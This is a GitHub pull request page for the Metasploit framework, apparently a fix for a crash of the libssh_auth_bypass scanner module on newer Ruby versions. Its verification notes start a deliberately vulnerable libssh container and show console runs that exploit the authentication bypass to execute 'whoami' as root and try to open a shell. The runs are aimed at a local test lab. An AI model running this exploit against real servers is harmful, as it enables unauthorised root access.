Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix libssh_auth_bypass crash on newer versions of Ruby #18203

Merged
merged 2 commits into from
Aug 3, 2023
Merged

Fix libssh_auth_bypass crash on newer versions of Ruby #18203

merged 2 commits into from
Aug 3, 2023

Conversation

adfoster-r7
Copy link
Contributor

Closes #18167

Verification

Run the vulnerable ssh target:

docker run -it -p 3333:22 vulhub/libssh:0.8.1

Verify Execute action with a cmd module works:

msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Execute CMD=whoami
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[*] 127.0.0.1:3333 - Executed: whoami
root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Verify a new session is created; Note that shell verification/interaction fails for me - but looks like an existing problem from when the functionality was first merged in?

msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > rerun rhost=127.0.0.1 rport=3333 action=Shell
[*] Reloading module...

[*] 127.0.0.1:3333 - Attempting authentication bypass
[+] 127.0.0.1:3333 - SSH-2.0-libssh_0.8.1 appears to be unpatched
[-] Command shell session 3 is not valid and will be closed
[*] 127.0.0.1 - Command shell session 3 closed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@adfoster-r7 adfoster-r7 mentioned this pull request Jul 20, 2023
Closed
@adfoster-r7 adfoster-r7 changed the title Fix libssh_auth_bypass crash on newer versions Fix libssh_auth_bypass crash on newer versions of Ruby Jul 20, 2023
@adfoster-r7 adfoster-r7 force-pushed the fix-libssh-auth-bypass-crash-on-new-ruby-versions branch from bdce48e to fa97281 Compare July 25, 2023 12:48
@cgranleese-r7 cgranleese-r7 added the rn-fix release notes fix label Aug 3, 2023
@cgranleese-r7 cgranleese-r7 merged commit 49c5b1d into rapid7:master Aug 3, 2023
34 checks passed
@cgranleese-r7 cgranleese-r7 self-assigned this Aug 3, 2023
@cgranleese-r7
Copy link
Contributor

Release Notes

Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby

@adfoster-r7 adfoster-r7 mentioned this pull request Nov 21, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sempervictus sempervictus sempervictus approved these changes

Assignees

@cgranleese-r7 cgranleese-r7

Labels
bug rn-fix release notes fix
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

auxiliary/scanner/ssh/libssh_auth_bypass ArgumentError wrong number of arguments
4 participants
@adfoster-r7 @cgranleese-r7 @sempervictus @cdelafuente-r7